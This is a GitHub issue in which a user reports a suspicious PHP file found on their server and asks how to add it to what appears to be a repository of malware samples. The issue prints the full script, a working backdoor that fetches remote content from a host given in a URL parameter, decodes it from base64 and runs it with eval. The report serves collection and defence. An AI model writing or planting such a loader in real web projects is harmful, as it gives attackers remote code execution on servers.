Skip to content

Where to add files that do not fit into a CMS category #23

@Xsmael

Description

@Xsmael

Hello,

I 'v seen this php script in one of my servers (i believe its malicious, cause it looks like some PHP injection) , which is running a php-vuejs web app, so no CMS,
How do i add it to your list ?

oaosmsru.php

<?php

$r = 'http://';

$rr = $r.$_GET['vgk4zxwpd9ljcu'];

$f = @file_get_contents($rr);

$h = urldecode(base64_decode($f));

$i = '?>';

$n = $i . $h;

eval($n);

?> 

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions